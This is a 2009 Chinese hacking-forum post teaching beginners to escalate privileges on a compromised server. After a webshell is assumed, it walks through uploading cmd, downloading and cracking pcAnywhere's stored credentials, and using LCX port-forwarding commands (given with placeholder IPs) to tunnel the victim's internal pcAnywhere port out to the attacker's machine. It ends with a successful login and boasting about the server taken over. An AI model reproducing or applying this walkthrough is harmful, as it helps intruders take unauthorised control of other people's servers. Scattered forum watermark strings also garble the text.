|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。9 S- P. ?- ^" K) o
, t/ k# Z' O7 U- s. u( ~- B8 O
提权方法:pcanywhere+LCX
2 }, v8 {* @1 ^9 P
$ h& j: T2 C: M/ ^& Q+ h) m8 q获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。$ l6 V8 ?' M- w
) d6 Z: a% J. ~" R在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。 d7 r+ L( o$ P; X k0 |0 ]
2 D# O* x t5 F" T; g6 i' k
( Y( `( e% X- a- g查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
% F6 V8 }! I7 n7 `# I$ C- j" A3 V2 X. ~- F$ N
. N7 K+ H# Q( \3 ~. G呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。+ E7 z$ J! ~" S! U" {4 G* I
7 Z/ P* q( p; N
6 L! D0 N. G3 Y$ x" d3 r0 n& U
. O( H9 P% B# Q- L2 ~7 W
6 f( s+ ], i5 ^3 g# s! Q由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
; y+ M; y9 x* V+ P& B0 Z
8 p0 E, p$ v" M0 p8 a* t
! C8 ^# j+ w5 h) ^, WLCX的用法再简单说下:
9 ^( ]) K) J" N# o' ~2 w
: H4 A$ n3 I6 K: B4 |3 ]0 }" N服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)4 @0 ^! Q6 V7 O1 o. B
* f& H* X7 i/ R7 t: |
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)0 s4 Q2 ^1 o! o6 ]- T
9 I3 Z$ \- E/ x& t由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。, q/ S* A+ S2 `- ]6 p3 I
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
5 g; E% T# A" u6 C$ Q# }1 K6 m/ ~" t8 a6 `
2 c# K- M& J! p( ]/ N' ?
5 E* b! {+ D" F6 K1 D. u
9 B+ g9 X; [" }" Q5 W$ j/ \+ B呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
5 P$ F5 N: w; Q# s( v
' T3 V5 r6 v. M- z1 i( }5 O/ f9 ]/ Y' x$ n1 q$ V
& q" F# H: v6 O
$ C$ M6 s% h' ~/ i我们本地连接试试,输入我们刚破解的账号密码, U# o8 S" `+ f
6 l- Y: W, M7 j9 p0 C3 U
% d. S# T3 L$ A3 K呵呵``连接成功,服务器不错,又一个8核^︵^
# }" w# Y2 S4 } h; i5 X2 I; y
: Q" x3 I- e, g' M8 a! B' ~4 ~- C4 H) Q; }# K% D
/ k7 j; Q: x8 R$ m- Q+ i
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
